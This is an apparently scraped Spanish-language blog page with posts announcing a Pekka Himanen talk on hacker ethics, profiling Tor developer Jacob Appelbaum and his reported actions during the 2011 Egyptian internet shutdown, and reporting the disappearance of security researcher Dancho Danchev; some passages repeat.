El dia del evento se habilitará el acceso a la retransmisión del evento.
http://www.fundacion.telefonica.com/es/debateyconocimiento/3ciclo/conf
10 de febrero a las 12:00 horas en el Salón de Actos de Fundación Telefónica en Madrid (Gran Vía 28, planta 2).
El evento podrá seguirse en directo por Internet (ver abajo)
En esta ocasión, la periodista Mamen Mendizábal, presentadora de informativos de la cadena de televisión LaSexta, moderará el evento.
Pekka Himanen es un filósofo finlandés, doctor por la Universidad de Helsinki, que ha trabajado como investigador en Finlandia, Inglaterra y en las universidades norteamericanas de Stanford y Berkeley. Asimismo, ha sido asesor en temas sobre la sociedad de la información en los distintos gobiernos finlandeses y es muy conocido en el mundo de la cultura por sus relaciones con los artistas más vanguardistas y los medios de comunicación.
Himanen ha plasmado sus ideas en su obra más conocida, La ética del hacker y el espíritu de la era de la información (2001), en la que desarrolla los fundamentos y consecuencias de la “ética hacker”.
Se trata de una nueva ética surgida en las comunidades virtuales o cibercomunidades, y aplicada hoy en día en todo tipo de comunidades. La expresión fue acuñada en los años 80 del siglo pasado por Steven Levy, y engloba los principios morales que surgieron a finales de los años cincuenta en el Laboratorio de Inteligencia Artificial del MIT y, en general, en la cultura de los aficionados a la informática de los años sesenta y setenta. De aquellos principios, que se resumen en el acceso libre a la información y en que la informática puede mejorar la calidad de vida de las personas, es heredero y principal representante actual nuestro ponente.
La ética del trabajo para el hacker se funda en el valor de la creatividad, y consiste en combinar la pasión con la libertad. El dinero deja de ser un valor en sí mismo y el beneficio se cifra en metas como el valor social y el libre acceso, la transparencia y la franqueza.
Himanen también es autor de El Estado del bienestar y la sociedad de la información: El modelo finlandés (2002), obra que comparte en autoría con el sociólogo Manuel Castells. Recientemente ha publicado "The Culture of Creativity".
Seguir el evento onlineLa conferencia se puede seguir EN DIRECTO desde esta página y a través de nuestra cuenta de Twitter: @fundacionTef con el hastag (etiqueta): #ftHimanen
El dia del evento se habilitará el acceso a la retransmisión del evento.
http://www.fundacion.telefonica.com/es/debateyconocimiento/3ciclo/conf
Etiquetas:
ciberderechos,
ethical hacking,
etica hacker,
pekka
miércoles, 2 de febrero de 2011
Jacob Appelbaum de TOR project
Hoy les quiero hablar de Jacob Appelbaum, Jacob es un investigador independiente en ciencias de la computacion, actualmente trabaja en la Universidad de Washington, y es uno de los miembros principales del proyecto TOR,->https://www.torproject.org/<- Jacob es reconocido por representar a Wikileaks en la "hope Conference 2010", ha sido intervenido por diferentes agencias de EEUU , las cuales intervinieron su cuenta de Twitter->http://twitter.com/ioerror<-. Jacob es un miembro activo del Hacker colectivo Cult of The Dead Cow (culto de la Vaca Muerta, ya se suena mas "poético" en Inglés) y es cofundador del Espacio Hacker en San Francisco junto con Mitch Altman, pro lo que me trae hoy a comentarles de él es lo que hizo por la causa Egipcia Jacob ha sacado tiempo para husmear en las conexiones a internet de varios ministerios egipcios. Su objetivo era encontrar puertas de entrada por las que dar conectividad a los egipcios a escondidas.
La existencia de estas vías de entrada puede estar detrás del cierre de Noor.net, el último ISP que funcionaba en Egipto. Aunque daba conectividad a la Bolsa cairota y firmas estadounidenses, el Gobierno desconectó sus routers. Su red estaba siendo usada para enviar mensajes sobre las protestas. Applebaum llegó a pedir por
Twitter los números de teléfonos móviles de algunos altos cargos.
Se desconoce para qué.
Otro link
https://blog.torproject.org/blog/jacob-and-matt-join-tor-project
http://en.wikipedia.org/wiki/Cult_of_the_Dead_Cow
Su Presentacion:
Jacob Appelbaum
Jacob Appelbaum is hacktivist.
My name is Jacob Appelbaum. I am a hacker. I am a photographer. I
am an activist. I audit code, I audit networks. I strive to change
the world I live in. I am security specialist for non-profit/NGO
organizations. My resume includes working with Greenpeace, The Open
Society Institute, Tactical Tech, The Ruckus Society, The
Rainforest Action Network and others. My professional emphasis is
in network security with a focus on environmental and human rights.
I'm interested in diving, motorcycles, piloting, documenting,
photography, robotics, language, traveling, writing and other
random things. I have an interest in the world.
Links
http://www.appelbaum.net/
Como leerán es un gran Personaje al que vale la pena emularlo y seguirlo en sus acciones, saludos
La existencia de estas vías de entrada puede estar detrás del cierre de Noor.net, el último ISP que funcionaba en Egipto. Aunque daba conectividad a la Bolsa cairota y firmas estadounidenses, el Gobierno desconectó sus routers. Su red estaba siendo usada para enviar mensajes sobre las protestas. Applebaum llegó a pedir por
Twitter los números de teléfonos móviles de algunos altos cargos.
Se desconoce para qué.
Otro link
https://blog.torproject.org/blog/jacob-and-matt-join-tor-project
http://en.wikipedia.org/wiki/Cult_of_the_Dead_Cow
Su Presentacion:
Jacob Appelbaum
Jacob Appelbaum is hacktivist.
My name is Jacob Appelbaum. I am a hacker. I am a photographer. I
am an activist. I audit code, I audit networks. I strive to change
the world I live in. I am security specialist for non-profit/NGO
organizations. My resume includes working with Greenpeace, The Open
Society Institute, Tactical Tech, The Ruckus Society, The
Rainforest Action Network and others. My professional emphasis is
in network security with a focus on environmental and human rights.
I'm interested in diving, motorcycles, piloting, documenting,
photography, robotics, language, traveling, writing and other
random things. I have an interest in the world.
Links
http://www.appelbaum.net/
Como leerán es un gran Personaje al que vale la pena emularlo y seguirlo en sus acciones, saludos
Etiquetas:
appelbaum,
egipto,
hacker hacktivismo,
seguridad informatica,
tor
miércoles, 19 de enero de 2011
Donde esta Dancho?
Dancho es un investigador de raza que ha colaborado intensamente en la lucha contra el cibercrimen organizado que hoy todos sabemos no es ciencia-ficción. Según fuentes cercanas a Dancho, se trato de establecer contactó con él desde hace varios meses atrás sin éxito alguno. ZDNet difundió este mismo día la noticia.
Lo cierto es que se sospecha fuertemente de la existencia de un problema que Dancho pudo tener en Bulgaria y por el cual estaría siendo víctima de persecuciones propias de un servicio de inteligencia. En una supuesta carta emitida por el propio Dancho a una persona de su confianza y a modo de "escudo", se evidencia un claro indicio de un potencial asunto que podría afectar su integridad física. En esta misma carta se adjuntan fotografías de lo que sería un sistema de escucha clandestina montado en la casa de Dancho.
Sin lugar a dudas quienes día a día colaboramos en la lucha contra el cibercrimen, e intentamos barrer esa sensación de impunidad con la cual goza la mafia organizada que opera a través de Internet, deseamos hacer extensiva esta noticia. Sobre todo para tratar de encontrar alguna respuesta, por mínima que sea, que pueda echar luz sobre el paradero y la situación de Dancho.
Links:
Ultimo Post: http://ddanchev.blogspot.com/2010/09/summarizing-3-years-of-research-into.html
Twitter: http://twitter.com/#!/danchodanchev
Comentario: dancho estaba enfocado en investigar el grupo que esta detras del gusano Koobface que ataca redes sociales como facebook y la red social china, del que se sabe son rusos sus creadores; es notoria ademas la concordancia de pausa en los posteos de Max Feodorov que ceso de postear tambien en la misma epoca que lo hizo Dancho, por lo que se podria inferir que serian la misma persona pero esto nada mas son conjeturas..
Lo cierto es que se sospecha fuertemente de la existencia de un problema que Dancho pudo tener en Bulgaria y por el cual estaría siendo víctima de persecuciones propias de un servicio de inteligencia. En una supuesta carta emitida por el propio Dancho a una persona de su confianza y a modo de "escudo", se evidencia un claro indicio de un potencial asunto que podría afectar su integridad física. En esta misma carta se adjuntan fotografías de lo que sería un sistema de escucha clandestina montado en la casa de Dancho.
Sin lugar a dudas quienes día a día colaboramos en la lucha contra el cibercrimen, e intentamos barrer esa sensación de impunidad con la cual goza la mafia organizada que opera a través de Internet, deseamos hacer extensiva esta noticia. Sobre todo para tratar de encontrar alguna respuesta, por mínima que sea, que pueda echar luz sobre el paradero y la situación de Dancho.
Links:
Ultimo Post: http://ddanchev.blogspot.com/2010/09/summarizing-3-years-of-research-into.html
Twitter: http://twitter.com/#!/danchodanchev
Comentario: dancho estaba enfocado en investigar el grupo que esta detras del gusano Koobface que ataca redes sociales como facebook y la red social china, del que se sabe son rusos sus creadores; es notoria ademas la concordancia de pausa en los posteos de Max Feodorov que ceso de postear tambien en la misma epoca que lo hizo Dancho, por lo que se podria inferir que serian la misma persona pero esto nada mas son conjeturas..
Etiquetas:
botnet,
facebook,
hackers,
koobface,
seguridad informatica
Suscribirse a:
Entradas (Atom)